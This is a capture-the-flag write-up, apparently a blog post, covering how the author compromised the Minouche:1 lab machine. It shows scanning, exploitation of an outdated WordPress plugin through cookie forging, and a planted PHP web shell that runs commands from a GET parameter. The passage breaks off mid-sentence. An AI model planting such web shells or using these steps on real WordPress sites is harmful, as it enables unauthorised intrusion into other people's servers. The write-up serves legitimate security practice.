Minouche : 1
Updated: Apr 25, 2020
In this article we are going to solve another boot2root challenge Minouche:1 . This is a very interesting machine and we are going to learn many new things throughout this article.
IP of the target : 192.168.43.193
First step is to find the open ports and services running in the system using the command : sudo nmap -A 192.168.43.193
Okay we have only two ports open . We decided to enumerate the HTTP Service as usual.
we found a wordpress website and now we decided to enumerate it more using wpcan ,command used : sudo wpscan --url http://192.168.43.193 --enumerate u,vp,vt
as usual like other wordpress CTF challenges we decided to do bruteforce attack to find the password but we failed to find it.
Now we run the dirb tool to find some more directories if we can find something useful information from them.
command used : sudo dirb http://192.168.43.193
These two directories looks useful for us , but /wp-admin/ requires username and password and /noindex/ is default Apache HTTP Server home page.
it seems like a dead-end for us until we found this link on the internet . Now as described in the link we again use wpscan using the command :
wpscan --url http://192.168.43.193 --wp-content-dir /wp-content/ --enumerate p --plugins-detection aggressive
we have a outdated plugin version and we decided to search on the internet to find some exploit for this plugin . luckily a python script is available on exploit-db . We downloaded the script on our local system and now lets run the script.
Now we need to pass these arguments with the script and run it again as : python exp.py -n kitty -u http://192.168.43.193
as we can see in the output that we need to use these cookies to login successfully as user kitty and then we can upload our shell and can obtain the reverse shell (looks very simple).
we change our path to /wp-admin/ and then we intercept the packet using burp suite to modify the cookie.
Now lets modify the cookie .
Forward this request and we can see now that we logged in as user kitty.
NOTE : if you are unable to login by using this method then use msfconsole , A very simple exploit is available there which will directly give you the user apache shell.
Okay , now like other CTF challenges we decided to edit the theme's 404.php file with a php reverse shell code , but when we execute the php file we don't get the reverse shell . Now with the help of simple php script we decided to traverse through the different system directories.
<?php echo "<pre>"; echo shell_exec(whoami); ?>
first of all we run very simple commands to check if everything is working fine.
now this command is working fine but when we try to execute some more command we found that we can't see the content of /home directory and also we can't execute any python script because python is not installed in the system and we can't also use nc here to take the reverse shell. Now we decided to check the main directory that is "/" using the same script but we failed to do so. Now we change our php script as .
<?php echo "<pre>"; echo system($_GET['exec']); ?>
Now we again execute this script with a GET parameter ?exec=ls / , and yes now this time we can see the content and found a very interest